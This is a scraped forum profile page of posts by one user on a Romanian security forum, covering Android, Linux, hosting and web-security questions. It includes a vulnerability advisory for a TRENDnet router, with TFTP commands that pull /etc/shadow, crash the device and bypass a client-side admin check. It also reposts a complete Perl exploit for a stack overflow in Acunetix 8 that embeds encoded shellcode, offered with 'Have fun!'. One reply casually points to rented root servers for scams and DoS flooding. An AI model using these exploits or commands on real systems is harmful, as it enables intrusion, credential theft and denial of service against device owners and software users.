SirGod
-
Posts
784 -
Joined
-
Last visited
-
Days Won
27
Posts posted by SirGod
-
-
ai decompilat firmwareul ? daca Da cu ce tooluri ... ca si eu vreau sa im bat capul cu o chestie la un dlink ?
Da. Ini?ial am decompilat firmware-ul. Am folosit binwalk, firmware-mod-kit ?i dd pentru a extrage filesystemul de la offsetul corect. Vezi ca dac? iei kitul de pe Google Code ?i FS e mai nou, cel default nu o sa îl poat? extrage. Asa am p??it ?i eu, dar are sursa pentru alte versiuni. Am compilat una mai noua ?i a mers.
-
Avand in vedere situatia din ultimul timp, am decis sa ma uit putin prin internals. Mai exista si alte chestii, dar nu avea rost sa le mentionez. Ce am gasit interesant, si nu am notat, este un fisier:
/www/CVS/Root
care are urmatorul continut:
:pserver:joe_lin@172.21.32.250:/cvsroot/WWW
Inca nu mi-am dat seama ce anume e, o sa investighez mai departe ca pare dubios.
Mai jos aveti "advisory"-ul:
# Title: TRENDnet TEW-634GRU 1.00.23 Multiple Vulnerabilities# Author: SirGod
# Website: www.rstforums.com
# Vendor Homepage: http://www.trendnet.com/
# Version: 1.00.23
1. Local file disclosure
The router has the TFTP service enabled by default and it can be accessed without any prior authentication (since TFTP does not support authentication). The whole filesystem is exposed to any person that is connected to the network.
Proof of concept:
sirgod@linuxbox:~$ tftp 192.168.10.1
tftp> get
(files) /etc/shadow
Received 357 bytes in 0.3 seconds
tftp> quit
sirgod@linuxbox:~$ cat shadow
root::10933:0:99999:7:::
Admin:[REMOVED]:10933:0:99999:7:::
bin::10933:0:99999:7:::
daemon::10933:0:99999:7:::
adm::10933:0:99999:7:::
lp:*:10933:0:99999:7:::
sync:*:10933:0:99999:7:::
shutdown:*:10933:0:99999:7:::
halt:*:10933:0:99999:7:::
uucp:*:10933:0:99999:7:::
operator:*:10933:0:99999:7:::
nobody::10933:0:99999:7:::
ap71::10933:0:99999:7:::2. Local router crash
If you upload a file to the router, it will crash. You will have to reset it (physically) and reconfigure it. After the file is uploaded, accessing the router's IP will give you a blank page and then it will crash.
Proof of concept:
sirgod@linuxbox:~$ tftp 192.168.10.1
tftp> put
(file) /home/file.txt /www/file.txt3. Privilege escalation
The web app incorporates two types of login: user and admin. Few actions (load settings, reset settings) require an admin account to perform them. The validation is done client-side, in JavaScript. See the following code snippet:
settings.asp
--- START CODE SNIPPET ---
function check_load_settings(){
var login_who="user";
if(login_who== "user"){
window.location.href ="back.asp";
}else{
if(confirm(msg[MSG17])){
if (get_by_id("file").value == ''){
alert(msg[MSG33]);
}else{
send_submit("form1");
}
}
}
}
function check_restore_default(){
var login_who="user";
if(login_who== "user"){
window.location.href ="back.asp";
}else{
if(confirm(msg[MSG34])){
send_submit("form2");
}
}
}
--- END CODE SNIPPET ---There are two ways to bypass this:
a) The easy way: submit the form from the JavaScript console, directly from your browser, by running:
send_submit("form2"); // To restore factory default settings.
send_submit("form3"); // To restore configuration settings (existent). You must select a file beforehand.
The other way: You can save the page locally, change the value of the variable and run it.-
2
-
-
Ok, am rausit sa-mi pun un Kali pe android numa' ca am o buba. Trebuie conectat la el cu VNC viewer ... Nu vi se pare un pic peste mana? Adica arata ca dracu' si in plus abia daca il poti controla.
Daca iti trebuie interfata vizuala, asta e singura solutie: sa te conectezi prin intermediul unui serviciu de genul VNC. Nu inteleg la ce te-ai fi asteptat.
-
As avea si eu nevoie la scoala, am un sony xperia cu android 4.2 oare merge sa fac crack la parola?
Daca l-ai rootat:
https://play.google.com/store/apps/details?id=com.zpwebsites.linuxonandroid
Cu asta poti sa iti alegi distributii de GNU/Linux (stripped-down, bineinteles) printre care si Backtrack, Kali etc. Incearca, desi ma indoiesc ca functioneaza suita aircrack (originala) de pe telefon.
-
Have fun!
# Exploit Title: Acunetix Stack Based overflow# Date: 24/04/14
# Exploit Author: Danor Cohen (An7i) - http://an7isec.blogspot.co.il/2014/04/pown-noobs-acunetix-0day.html
# Vendor Homepage: http://www.acunetix.com/
# Software Link: http://www.acunetix.com/vulnerability-scanner/download/
# Version: 8 build 20120704
# Tested on: XP
[B]#This exploit generates HTML file, if this HTML will be scanned with ACUNETIX, shell will be executed.[/B]
my $file= "index.html";
my $HTMLHeader1 = "<html>\r\n";
my $HTMLHeader2 = "\r\n</html>";
my $IMGheader1 = "<img style=\"opacity:0.0;filter:alpha(opacity=0);\" src=http://";
my $IMGheader2 = "><br>\n";
my $DomainName1 = "XSS";
my $DomainName2 = "CSRF";
my $DomainName3 = "DeepScan";
my $DomainName4 = "NetworkScan";
my $DomainName5 = "DenialOfService";
my $GeneralDotPadding = "." x 190;
my $ExploitDomain = "SQLInjection";
my $DotPadding = "." x (202-length($ExploitDomain));
my $Padding1 = "A"x66;
my $Padding2 = "B"x4;
my $FlowCorrector = "500f"; #0x66303035 : readable memory location for fixing the flow
my $EIPOverWrite = "]Qy~"; #0x7e79515d (JMP ESP from SXS.DLL).
# windows/exec - 461 bytes
# http://www.metasploit.com
# Encoder: x86/alpha_upper
# VERBOSE=false, PrependMigrate=false, EXITFUNC=thread,
# CMD=calc.exe
my $shellcode2 =
"\x54\x59\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x51\x5a" .
"\x56\x54\x58\x33\x30\x56\x58\x34\x41\x50\x30\x41\x33\x48" .
"\x48\x30\x41\x30\x30\x41\x42\x41\x41\x42\x54\x41\x41\x51" .
"\x32\x41\x42\x32\x42\x42\x30\x42\x42\x58\x50\x38\x41\x43" .
"\x4a\x4a\x49\x4b\x4c\x5a\x48\x4b\x39\x33\x30\x45\x50\x53" .
"\x30\x33\x50\x4c\x49\x4a\x45\x46\x51\x48\x52\x52\x44\x4c" .
"\x4b\x36\x32\x50\x30\x4c\x4b\x51\x42\x34\x4c\x4c\x4b\x51" .
"\x42\x35\x44\x4c\x4b\x52\x52\x37\x58\x54\x4f\x48\x37\x51" .
"\x5a\x57\x56\x50\x31\x4b\x4f\x46\x51\x4f\x30\x4e\x4c\x37" .
"\x4c\x45\x31\x33\x4c\x45\x52\x36\x4c\x47\x50\x59\x51\x58" .
"\x4f\x54\x4d\x53\x31\x49\x57\x4d\x32\x4c\x30\x50\x52\x46" .
"\x37\x4c\x4b\x31\x42\x44\x50\x4c\x4b\x30\x42\x57\x4c\x45" .
"\x51\x4e\x30\x4c\x4b\x57\x30\x34\x38\x4b\x35\x59\x50\x42" .
"\x54\x31\x5a\x53\x31\x48\x50\x36\x30\x4c\x4b\x37\x38\x52" .
"\x38\x4c\x4b\x46\x38\x51\x30\x43\x31\x49\x43\x4a\x43\x47" .
"\x4c\x47\x39\x4c\x4b\x56\x54\x4c\x4b\x45\x51\x48\x56\x36" .
"\x51\x4b\x4f\x56\x51\x39\x50\x4e\x4c\x39\x51\x38\x4f\x54" .
"\x4d\x43\x31\x49\x57\x56\x58\x4b\x50\x43\x45\x4a\x54\x35" .
"\x53\x53\x4d\x4b\x48\x57\x4b\x43\x4d\x57\x54\x34\x35\x5a" .
"\x42\x31\x48\x4c\x4b\x56\x38\x37\x54\x33\x31\x48\x53\x32" .
"\x46\x4c\x4b\x34\x4c\x50\x4b\x4c\x4b\x56\x38\x35\x4c\x43" .
"\x31\x58\x53\x4c\x4b\x43\x34\x4c\x4b\x43\x31\x4e\x30\x4b" .
"\x39\x51\x54\x31\x34\x56\x44\x51\x4b\x51\x4b\x43\x51\x36" .
"\x39\x51\x4a\x30\x51\x4b\x4f\x4b\x50\x50\x58\x51\x4f\x30" .
"\x5a\x4c\x4b\x54\x52\x4a\x4b\x4b\x36\x31\x4d\x33\x5a\x53" .
"\x31\x4c\x4d\x4b\x35\x4f\x49\x55\x50\x35\x50\x35\x50\x46" .
"\x30\x42\x48\x36\x51\x4c\x4b\x32\x4f\x4b\x37\x4b\x4f\x58" .
"\x55\x4f\x4b\x4b\x50\x45\x4d\x36\x4a\x34\x4a\x43\x58\x4e" .
"\x46\x4d\x45\x4f\x4d\x4d\x4d\x4b\x4f\x39\x45\x57\x4c\x43" .
"\x36\x43\x4c\x44\x4a\x4d\x50\x4b\x4b\x4d\x30\x42\x55\x34" .
"\x45\x4f\x4b\x30\x47\x54\x53\x34\x32\x42\x4f\x52\x4a\x33" .
"\x30\x51\x43\x4b\x4f\x59\x45\x45\x33\x33\x51\x52\x4c\x35" .
"\x33\x46\x4e\x35\x35\x53\x48\x52\x45\x45\x50\x41\x41";
my $FinalDomainName1 = $IMGheader1.$DomainName1.$GeneralDotPadding.$IMGheader2;
my $FinalDomainName2 = $IMGheader1.$DomainName2.$GeneralDotPadding.$IMGheader2;
my $FinalDomainName3 = $IMGheader1.$DomainName3.$GeneralDotPadding.$IMGheader2;
my $FinalDomainName4 = $IMGheader1.$DomainName4.$GeneralDotPadding.$IMGheader2;
my $FinalDomainName5 = $IMGheader1.$DomainName5.$GeneralDotPadding.$IMGheader2;
my $FinalExploitDomain = $IMGheader1.$ExploitDomain.$DotPadding.$Padding1.$FlowCorrector.$Padding2.$EIPOverWrite.$shellcode.$IMGheader2;
open($FILE,">$file");
print $FILE $HTMLHeader1.$FinalDomainName1.$FinalDomainName2.$FinalDomainName3.$FinalDomainName4.$FinalDomainName5.$FinalExploitDomain.$HTMLHeader2;
close($FILE);
print"Acunetix Killer File Created successfully\n"; -
Pacat ca: Your password can't be longer than 16 characters.
-
Se pare ca versiunea 3.14 s-a lansat chiar in 3.14. Hehe.
"The Linux 3.14 "Shuffling Zombie Juror" kernel has been released. Significant improvements to Linux 3.14 include the mainlining of SCHED_DEADLINE, stable support for Intel Broadwell CPU graphics, Xen PVH support, stable support for ZRAM, and many other additions. There's also a tentative feature list on KernelNewbies.org."
-
Wow, mersi pentru tutorial. Îmi par cunoscute câteva exemple. Oare de ce? Ah, da, pentru ca eu l-am scris acum 5 ani. Bine, nu eu am scris c?catul asta, tu doar ai copiat exemplele ?i tips-urile.
http://exploit-db.com/papers/12871
Pe lâng? ca mi-ai copiat exemplele, ai tradus prost, ai mai ?i introdus gre?eli în el. Dac? te ui?i atent po?i sa îmi vezi numele în câteva exemple.
) Penibil.
-
Incearca cu Easy Rooting Toolkit:
[L][ROOT] DooMLoRD Easy Rooting Toolkit (v17) {perf_event exploit}[20130717] - xda-developers
-
Am facut deja un "grabber" pentru a vedea ce variabile se trimit, insa nu prea inteleg exact la ce te referi in legatura cu protectia crsf.
Ai putea sa imi dai un exemplu de cod cum as putea sa extrag variabilele cu preg_match?
Multumesc.
Pentru protectia impotriva CSRF se adauga, de obicei, un input hidden cu un token (un cod unic, de obicei un hash random). La trimiterea formularului se verifica daca acel cod este valid: daca este, formularul este trimis, daca nu este valid ti se intoarce o eroare sau te redirectioneaza etc. Ca si un exemplu real, sa intelegi cum functioneaza, sa zicem ca ai in control panel un formular de schimbare a parolei care are doua inputuri, new password, repeat new password si mai are un buton de submit (fara sa ceara parola veche). Tu poti abuza de asta creand o pagina HTML cu inputurile deja completate (parola pe care vrei sa o setezi tu) si sa faci submit al formului pe eventul onLoad cu datele tale, catre pagina care le proceseaza. Cand "victima" it va vizita pagina se va face un request catre pagina care schimba parola si parola va fi schimbata cu cea prestabilita de tine. "Victima" doar trebuie sa fie logata. Ca sa ajungem inapoi la hash-ul impotriva CSRF, daca in exemplu mentionat, pe langa cele doua inputuri mai exista si un hash unic, tu nu aveai cum sa faci submit la form deoarece nu aveai cum sa stii acel hash incat sa il "completezi" in pagina ta HTML.
Pentru preg_match:
Ai exemple destul acolo.
-
"The Snowden revelations continue, with The Intercept releasing an NSA document titled 'I hunt sys admins' (PDF on Cryptome). The document details NSA plans to break into systems administrators' computers in order to gain access to the networks they control. The Intercept has a detailed analysis of the leaked document. Quoting: 'The classified posts reveal how the NSA official aspired to create a database that would function as an international hit list of sys admins to potentially target. Yet the document makes clear that the admins are not suspected of any criminal activity – they are targeted only because they control access to networks the agency wants to infiltrate. "Who better to target than the person that already has the ‘keys to the kingdom’?" one of the posts says.'"
-
Nu sunt un mare fan al jocurilor, dar de-a lungul timpului am avut: Real Racing 3, Buttons and Scissors, Earn to Die, Deer Hunter 2014, Fun Run, 2 Player Reactor, Hungry Shark Evolution, Lazors.
-
Deci care plm era solutia?
Nu exista solutie.
-
Motive pentru a upgrada la 4.4.x sunt multe (memory management mai bun, new features, suport pentru diverse deviceuri, cloud printing etc). Un motiv sa ramai pe 4.2.2 ar fi ca incepand cu 4.4 s-a scos AppOps (nativ), mai exact acel "hidden feature" care iti permite sa restrictionezi permisiuni pentru fiecare aplicatie in parte (e.g. restrictionarea accesului aplicatiei Facebook la camera foto, locatie etc.). Poti face si lucrul asta pe 4.4.2 daca iti rootezi telefonul, instalezi xposed framework si modulul pentru controlul permisiunilor unde o sa ai acces chiar la mai multe permisiuni decat cele prezente in AppOps. Un alt motiv ar fi stabilitatea/compatibilitatea, de obicei versiunile cu care sunt lansate produsele sunt cele mai potrivite din punct de vedere al compatibilitatii cu hardware-ul respectiv.
-
Salut,
Mai toate firmele de hosting iti pot oferi un VPS/Dedicat cu sistem de operare la alegere (de obicei bazat pe UNIX/GNU Linux). Tin sa te anunt ca pe toate aceste sisteme tu vei avea acces root, unde poti face tot ce vrei tu (scam-uri, videochat, DoS etc.) pe proprie raspundere.
Mai exista alternativa sa iti instalezi un astfel de sistem pe un PC propriu. => "root gratis". Tot la fel, faci ce vrei tu. Din pacate nu exista un host, momentan, care sa fie specializat pe ce vrei tu, mai exact "flood" si "udp.pl".
Mult noroc!
-
Ca si sfaturi pentru cititorii tutorialului: nu va bazati pe "hidden SSID" si "MAC filtering". Sunt impedimente aproximativ nesemnificative. Folositi WPA2 (AES ca cipher) cu parola cel putin decenta si aveti grija daca va jucati cu WPS (recomandat sa fie OFF). Iar pentru viteza, a aparut de ceva timp 802.11ac (doar pe 5GHz) - net superior, s-a trecut de la Mb la Gb.
-
"Researchers at Bromium Labs are expected to announce today they have developed an exploit that bypasses all of the mitigations in Microsoft's Enhanced Mitigation Experience Toolkit (EMET). Principal security researcher Jared DeMott is delivered a presentation at the Security BSides conference explaining how the company's researchers were able to bypass all of the memory protections offered within the free Windows toolkit. The work is significant given that Microsoft has been quick to urge customers to install and run EMET as a temporary mitigation against zero-day exploits targeting memory vulnerabilities in Windows or Internet Explorer. The exploit bypasses all of EMET's mitigations, unlike previous bypasses that were able to beat only certain aspects of the tool. Researchers took a real-world IE exploit and tweaked it until they had a complete bypass of EMET's ROP, heap spray, SEHOP, ASLR, and DEP mitigations."
Via msm1267, Slashdot: News for nerds, stuff that matters
-
1
-
-
Replacement-uri pentru aplicatia YouTube. Functioneaza si in background.
https://play.google.com/store/apps/details?id=jp.co.asbit.pvstar&hl=en
https://play.google.com/store/apps/details?id=com.nobeid.uListenLite
https://play.google.com/store/apps/details?id=com.jrzheng.supertubeplayer
-
-
Foarte bine ca o sa introduca si telefoane cu Ubuntu in magazine. Sa apara si altele. Trebuie sa fie competite pentru ca dezvoltatorii sa se zbata sa se mentina si sa scoata produse si mai inovatoare cat si mai accesibile. Nu sunt bune monopolurile.
-
Site-ul nu are feed. Daca vrei sa preiei continutul nu ai decat sa iei continutul paginii si sa parsezi sursa. Vad ca video-urile nu au link direct in prima pagina, va fi necesar sa le acesezi pe fiecare in parte si sa parsezi fiecare sursa in parte.
-
Ma bag si eu pe partea de development si de creare de challenge-uri.
-
Atunci rulezi comanda de inregistrare a DLL-ului cu fisierul din folderul SysWoW64.
-
Daca tot iti da eroarea incearca sa inregistrezi dll-ul. Intri in command prompt, navighezi in folderul unde ai dll-ul si introduci:
regsvr32 python27.dllDar aici depinde de sistemul de operare. E x86 sau x64? Deoarece Microsoft zice ca:
Note On a 64-bit version of Windows operating system, there are two versions of the Regsv32.exe file:- The 64-bit version is %systemroot%\System32\regsvr32.exe.
- The 32-bit version is %systemroot%\SysWoW64\regsvr32.exe.
O sa ia versiunea implicita in functie de sistemul de operare.
- The 64-bit version is %systemroot%\System32\regsvr32.exe.
[RST] [Tutorial Linux BASH] Photo on login fail
in Proiecte RST
Posted
Este un mic ghid pentru a evita sau a afla cine incearca sa ne faca glume proaste, sau pentru a ne ajuta sa identificam un "intrus". Este facut si testat pe Ubuntu 14.04, cel mai probabil variaza de la distributie la distributie, dar se rezolva din configurare.
1. Instalam streamer pentru a captura poza. Puteti folosi si altceva: ffmpeg, mplayer etc.
2. Instalam mutt pentru a trimite mail cu atasament:
3. Gasim camera pe care vrem sa o folosim. De obicei este video0 (in special in cazul laptopurilor, fiind incorporata):
4. Acum avem doua fisiere: config.cfg si script.sh.
>>> config.cfg
>>> script.sh
Acum sa vedem ce si cum:
>>> config.cfg
stringName tine un string care este scris in log-ul de autentificare (in cazul Ubuntu) in momentul in care exista un failed login attempt.
logFile este log-ul unde cautam stringul.
deviceAddress este locatia camerei web cu care facem poza.
saveLocation este locatia unde vrem sa salvam pozele.
emailAddress este adresa de mail la care sa trimita poza.
bodyText este body-ul mail-ului.
>>> script.sh
FILE_NO_FILE este un fisier unde stocam un numar pe care il adaugam la sfarsitul pozei pentru a nu rescrie poza.
FILE_NO este variabila unde tinem numarul initial.
STRING, LOGFILE, LOCATION, DEVICE, BODY si EMAIL sunt variabilele in care stocam datele scrise in fisierul de configurare.
Putem totul intr-un loop infinit pentru a ne asigura ca ruleaza permanent. Mai departe, verificam daca FILE_NO_FILE exista, apoi incrementam numarul. Daca string-ul este gasit in log, comanda pentru captura poza este executata si mail-ul este trimis catre noi. Am adaugat si un timeout de 1 secunda intre executii pentru a evita alte situatii. Ulterior golim logul.
5. Executarea scriptului
Pentru a evita terminarea executiei in momentul in care se face log off/lock, vom rula scriptul cu nohup:
Acum asteptati "intrusi". Se poate adauga la startup daca aveti nevoie. Cu siguranta exista si variante mai bune, le astept.